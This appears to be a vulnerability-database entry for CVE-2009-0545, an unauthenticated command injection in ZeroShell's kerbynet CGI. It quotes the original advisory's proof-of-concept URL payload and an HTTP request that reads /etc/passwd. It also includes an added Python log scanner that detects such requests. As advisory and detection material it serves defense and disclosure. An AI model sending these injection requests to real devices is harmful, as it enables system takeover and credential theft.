ZeroShell 'cgi-bin/kerbynet' Remote Command Execution Vulnerability

Vulnerability ID: 1117369    Vulnerability type: Input validation
Published: 2009-02-09    Updated: 2009-02-23
CVE ID: CVE-2009-0545    CNNVD-ID: CNNVD-200902-289
Platform: Hardware    CVSS score: 10.0
|Vulnerability sources
https://www.exploit-db.com/exploits/8023
https://www.securityfocus.com/bid/33702
https://cxsecurity.com/issue/WLB-2009020029
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-289
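|Vulnerability details
ZeroShell is a Linux distribution developed for network servers and embedded devices; it provides the main network functions such as routing, bridging and firewalling. In ZeroShell 1.0beta11 and earlier, cgi-bin/kerbynet allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter of the NoAuthREQ x509List action.
|Exploit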
==================================================== 
ZeroShell <= 1.0beta11 Remote Code Execution

Original Advisory: 
http://www.ikkisoft.com/stuff/LC-2009-01.txt

luca.carettoni[at]ikkisoft[dot]com
==================================================== 


ZeroShell (http://www.zeroshell.net/eng/) is a small Linux distribution 
for servers and embedded devices. This Linux distro can be configured 
and managed with an easy to use web console.

ZeroShell is prone to an arbitrary code execution vulnerability due to
an improper input validation mechanism. An aggressor may abuse this 
weakness in order to compromise the entire system. 
Authentication is not required in order to exploit this flaw.

[Proof of Concept]
  
/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;<CMD HERE>;%22
  
In addition to the Unix commands, it is possible to abuse the 
ZeroShell scripts themselves. For instance it is likely to use the 
"getkey" script in order to retrieve remote files, including the content
in the html page.
  
{HTTP REQUEST}
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host: <IP>

# milw0rm.com [2009-02-09]
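
One way to look for this request shape in web access logs, as an added example that is not part of the original advisory or of ZeroShell. It assumes Common Log Format lines; the function names, the metacharacter list and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Quoting, separator, substitution and redirection characters (assumed list).
SHELL_META = set(";|&`$<>\"'\\\n\r(){}")
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')


def query_params(query):
    """Split on '&' only, so a ';' inside a value stays part of that value."""
    params = {}
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def is_injection_attempt(target):
    """Flag x509List requests whose decoded 'type' holds a shell metacharacter."""
    parts = urlsplit(target)
    if not parts.path.endswith("/cgi-bin/kerbynet"):
        return False
    params = query_params(parts.query)
    if "NoAuthREQ" not in params.get("Section", []):
        return False
    if "x509List" not in params.get("Action", []):
        return False
    return any(SHELL_META & set(value) for value in params.get("type", []))


def scan(lines):
    """Return (client, request target) for every flagged access-log line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match and is_injection_attempt(match.group(1)):
            hits.append((line.split(" ", 1)[0], match.group(1)))
    return hits


# Constructed sample lines; "CMD" is a placeholder, "type=user" an assumed value.
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Feb/2009:10:00:01 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=user HTTP/1.1" 200 512',
    '198.51.100.7 - - [09/Feb/2009:10:00:05 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;CMD;%22 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [09/Feb/2009:10:00:09 +0000] "GET /cgi-bin/kerbynet?Action=x509List&Section=NoAuthREQ&type=*%22%3BCMD%3B%22 HTTP/1.1" 200 90',
]

for hit in scan(SAMPLE_LOG):
    print(*hit)
```

The values are percent-decoded before the check, so an encoded separator such as `%3B` is caught as well as a literal `;`.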
|Affected products
Fulvio Ricciardi ZeroShell 1.0beta11
|References

Source: MISC
Link: http://www.zeroshell.net/eng/patch-details/#C100
Source: MISC
Link: http://www.zeroshell.net/eng/announcements/
Source: VUPEN
Name: ADV-2009-0385
Link: http://www.frsirt.com/english/advisories/2009/0385
Source: BUGTRAQ
Name: 20090209 ZeroShell <= 1.0beta11 Remote Code Execution
Link: http://www.securityfocus.com/archive/1/archive/1/500763/100/0/threaded
Source: MILW0RM
Name: 8023
Link: http://www.milw0rm.com/exploits/8023
Source: MISC
Link: http://www.ikkisoft.com/stuff/LC-2009-01.txt